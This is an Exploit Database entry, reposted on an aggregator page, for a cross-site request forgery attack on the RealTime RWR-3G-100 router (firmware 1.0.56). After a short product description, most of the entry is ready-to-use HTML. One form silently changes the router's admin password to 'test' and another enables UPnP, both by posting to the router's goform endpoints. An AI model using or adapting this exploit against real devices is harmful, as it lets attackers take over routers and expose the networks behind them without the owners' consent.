RealTime RWR-3G-100 Router – Cross-Site Request Forgery (Change Admin Password)

• Exploit Database
• 13 阅读

• 作者： Touhid M.Shaikh
  日期： 2017-08-12
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/42449/

• <!--
  # Exploit Title: RealTime RWR-3G-100 Router Cross-Site Request Forgery
  (Change Admin Password)
  # Date: 13 Aug, 2017
  # Vendor Homepage : http://www.rtsindia.com/
  # Vendor Contact : https://www.linkedin.com/company/realtime-system-ltd.
  # Firmware Version : Ver1.0.56
  # Exploit Author: Touhid M.Shaikh
  # Contact: https://github.com/touhidshaikh
  # Website: http://touhidshaikh.com/
  
  
  ===================
  Product Description
  ===================
  Provides Wireless/ Wired Broadband connectivity to SOHO & SME. Provides
  Broadband connectivity to multiple users on the move.Uses 3G/2.75G USB
  Dongle to get connected to Broadband/ Optionally Uses Wired Broadband
  connectivity. Supports HSPA, EVDO, UMTS, HSDPA & HSUPA USB Dongles and
  Compatible with Blackberry & iPhone. Creates 802.11n Wi-Fi Hotspot for
  Multiple Users to get connected to Broadband. Small & Sleek Portable
  Router, Easy to Install & Manage.
  -->
  
  
  
  <!-- CHANGE ADMIN PASSWORD to test-->
  <form action=http://192.168.1.1/goform/formPasswordSetup method=POST
  name="password">
  <input type="text" name="username" value="admin">
  <input type="password" name="newpass" value="test">
  <input type="password" name="confpass" value="test">
  <input type="hidden" value="/status.asp" name="submit-url">
  <input type="submit" value="Apply Changes" name="save">
  <input type="reset" value="Reset" name="reset" id="password Reset">
  </form>
  <!-- CHANGE ADMIN PASSWORD Ends here-->
  
  
  <!---Enable The UPNP Service-->
  <form action=http://192.168.1.1/goform/formUpnpSetup method=POST
  name="upnpSetup">
  <input type="radio" name="upnpfunction" id="upnpfunctiony" value="yes"
  checked>
  <input type="radio" name="upnpfunction" id="upnpfunctionn" value="no" >
  
  <!--
  <input type="radio" name="avupnpfunction" id="avupnpfunctiony"
  value="yes" checked>
  <input type="radio" name="avupnpfunction" id="avupnpfunctionn" value="no"
  >
  -->
  <input type="submit" value="Apply Changes" name="save" id="upnp apply" >
  <input type="reset" value="Reset" name="reset" id="upnp Reset">
  <input type="hidden" value="/upnp.asp" name="submit-url">
  </form>
  <!---Enable The UPNP Service Ends here-->
  
  
  
  <!--
  ======GREEtZ=====
  my cool Broo and Pratik K.tjani
  -->